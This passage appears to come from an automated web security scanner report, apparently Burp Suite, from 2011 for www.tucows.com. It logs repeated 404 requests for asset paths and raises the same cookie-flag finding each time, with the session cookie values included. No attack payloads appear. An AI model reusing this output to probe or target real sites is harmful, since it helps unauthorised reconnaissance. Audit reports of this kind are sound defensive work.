HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us</title> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:30 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/javascript:void(null) HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:39 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/lostpass.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:13 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:57 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
